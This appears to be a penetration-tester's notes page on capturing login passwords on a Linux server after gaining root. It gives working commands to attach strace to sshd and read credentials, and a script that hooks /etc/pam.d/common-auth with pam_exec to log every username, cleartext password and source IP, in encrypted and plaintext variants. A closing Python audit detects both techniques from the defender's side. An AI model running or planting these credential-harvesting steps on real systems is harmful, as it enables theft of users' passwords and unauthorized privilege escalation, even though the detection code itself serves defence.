# Sniffing Passwords

## Strace

With root access on a server we can attach to the SSH service and sniff usernames and passwords in plaintext if a user authenticates. This can be powerful when looking for new accounts to pivot with and/or higher privileged accounts.

```bash
[root@victimHost ~]# w
 15:05:18 up 26 days,  6:25,  2 users,  load average: 0.00, 0.05, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
unixadm  pts/0    someHost         15:04    6.00s  0.03s  0.00s sshd: unixadm [priv]

[root@victimHost ~]# ps aux | grep ssh
root      1366  0.0  0.0 113000  4368 ?        Ss   Jun02   0:00 /usr/sbin/sshd -D
unixadm  28721  0.0  0.0 176412  2644 ?        S    10:04   0:00 sshd: unixadm@pts/0

[root@victimHost ~]# kill 28721
[root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log
strace: Process 1366 attached
```

***

## PAM

With root access on a server we can create a simple bash script to log all authentication requests handled by `pam.d`. The log data will show a timestamp, username, password and source IP, all in cleartext. This is of course very useful when trying to pivot and/or escalate privileges.

### Encrypted logs

The helper script below creates a new script, `pam_log.sh`, to be uploaded to the target host.

```bash
#!/bin/bash
# Generates an RSA key pair and writes pam_log.sh, which encrypts every
# captured line with the public key before appending it to the log.
KEY_DIR="./ssh_key_pair"
PRIVATE_KEY_PATH="${KEY_DIR}/pam-id_rsa"
PUBLIC_KEY_PATH="${KEY_DIR}/pam-id_rsa.pub"
PEM_KEY_PATH="${KEY_DIR}/pam-id_rsa.pem"
LOG_SCRIPT_PATH="./pam_log.sh"

mkdir -p "$KEY_DIR"
echo "[+] Generating SSH key pair..."
ssh-keygen -t rsa -b 4096 -m PEM -f "$PRIVATE_KEY_PATH" -N "" >/dev/null

echo "[+] Extracting public key in PEM format..."
ssh-keygen -e -f "$PUBLIC_KEY_PATH" -m PEM > "${PEM_KEY_PATH}"

# Collapse the PEM block to a single line so it can be embedded in the generated script
SSH_PUBLIC_KEY=$(sed ':a;N;$!ba;s/\n/\\n/g' "${PEM_KEY_PATH}")

echo "[+] Creating the log script..."
# Unquoted heredoc: $SSH_PUBLIC_KEY expands now, the \$-escaped parts at run time
cat <<EOF > "$LOG_SCRIPT_PATH"
#!/bin/bash
SSH_PUBLIC_KEY="$SSH_PUBLIC_KEY"
LOG_ENTRY=" \$(date) \${PAM_USER}, \$(cat -), From: \${PAM_RHOST}"
echo "\$LOG_ENTRY" | openssl pkeyutl -encrypt -inkey <(echo -e "\$SSH_PUBLIC_KEY" | sed 's/\\n/\n/g') -pubin | base64 >> /var/log/creds.log
EOF

chmod +x "$LOG_SCRIPT_PATH"
echo "[+] Generated log script: $LOG_SCRIPT_PATH"
echo -e "\n[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey $PRIVATE_KEY_PATH"
```

```bash
kdev :: ~/log » ./create_pam_log.sh 
[+] Generating SSH key pair...
[+] Extracting public key in PEM format...
[+] Creating the log script...
[+] Generated log script: ./pam_log.sh

[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey ./ssh_key_pair/pam-id_rsa
```

Upload `pam_log.sh` to the target and modify `/etc/pam.d/common-auth` to execute the script on authentication requests.

```bash
kdev :: ~ » echo "auth optional pam_exec.so quiet expose_authtok /home/void/log/pam_log.sh" | sudo tee -a /etc/pam.d/common-auth
```

Wait for a user to log in and reap the rewards. Other users are unable to read the content without the private key.

```bash
kdev :: ~/log » cat /var/log/creds.log
WNGIdThHgz[...]Hww2aa0=
kdev :: ~/log » cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey ./ssh_key_pair/pam-id_rsa
 Fri Mar 14 11:18:14 CET 2025 void, Passw0rd!, From: ::1
```

### Unencrypted logs

If you don't care about the security aspects, or if the target doesn't have `openssl` or `base64` installed, you can use this simpler unencrypted version instead to log authentication requests.

```bash
## Create the simple script to log logins
$ chmod 700 /usr/local/bin/capture.sh
$ cat /usr/local/bin/capture.sh
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/creds.log

## Create the log file and set restrictive permissions so no unauthorized user can read it
$ touch /var/log/creds.log
$ chmod 600 /var/log/creds.log

## Edit /etc/pam.d/common-auth and add the following line
$ cat /etc/pam.d/common-auth
...
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh

## All services using PAM will now be logged to /var/log/creds.log in clear text
$ cat /var/log/creds.log
 Wed Nov 22 12:56:54 CET 2023 void, Passw0rd!, From: ::1
```
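From the defender's side, both techniques on this page leave a checkable trace: the PAM variant needs a `pam_exec.so` rule carrying `expose_authtok` in `/etc/pam.d`, and the strace variant shows up as a non-zero `TracerPid` in `/proc/<pid>/status` of the `sshd` process. The audit below is an added example, not part of the original notes; the `common-auth` text and `/proc` status text are constructed samples, and `audit_host` is a hypothetical helper that runs the same two checks against a live host.

```python
import re
from pathlib import Path
# Constructed sample: an /etc/pam.d/common-auth carrying the rule shown on this page
SAMPLE_COMMON_AUTH = """\
# common-auth - authentication settings common to all services
auth    [success=1 default=ignore]  pam_unix.so nullok
auth    requisite                   pam_deny.so
auth    required                    pam_permit.so
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh
"""
# Constructed sample: /proc/<pid>/status of an sshd that has a tracer attached
SAMPLE_STATUS = "Name:\tsshd\nState:\tS (sleeping)\nPid:\t1366\nTracerPid:\t4242\n"
# One PAM rule: type, control (a word or [bracketed ...]), module path, arguments
PAM_RULE = re.compile(r"^(\S+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")

def find_authtok_exposure(config_text):
    """(line_no, module, handler) for each pam_exec.so rule that passes the cleartext password on."""
    findings = []
    for no, raw in enumerate(config_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # strip comments and blanks
        m = PAM_RULE.match(line) if line and not line.startswith("@") else None
        if not m:
            continue
        module, args = m.group(3), m.group(4).split()
        if module.rsplit("/", 1)[-1] == "pam_exec.so" and "expose_authtok" in args:
            handler = next((a for a in args if a.startswith("/")), "?")
            findings.append((no, module, handler))
    return findings

def tracer_pid(status_text):
    """TracerPid from /proc/<pid>/status; non-zero means ptrace (e.g. strace) is attached."""
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split()[1])
    return 0

def audit_host(pam_dir="/etc/pam.d", proc="/proc"):
    """Hypothetical live check: run both detections over the running system (run as root)."""
    report = []
    for cfg in (p for p in sorted(Path(pam_dir).glob("*")) if p.is_file()):
        for no, module, handler in find_authtok_exposure(cfg.read_text(errors="replace")):
            report.append(f"{cfg}:{no}: {module} expose_authtok -> {handler}")
    for status in Path(proc).glob("[0-9]*/status"):
        try:
            text = status.read_text()
        except OSError:                              # process exited mid-scan
            continue
        if text.startswith("Name:\tsshd") and tracer_pid(text):
            report.append(f"pid {status.parent.name}: sshd traced by pid {tracer_pid(text)}")
    return report
```

Calling `audit_host()` as root walks the live `/etc/pam.d` and `/proc`; the two parsing functions can be exercised offline against the constructed samples.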
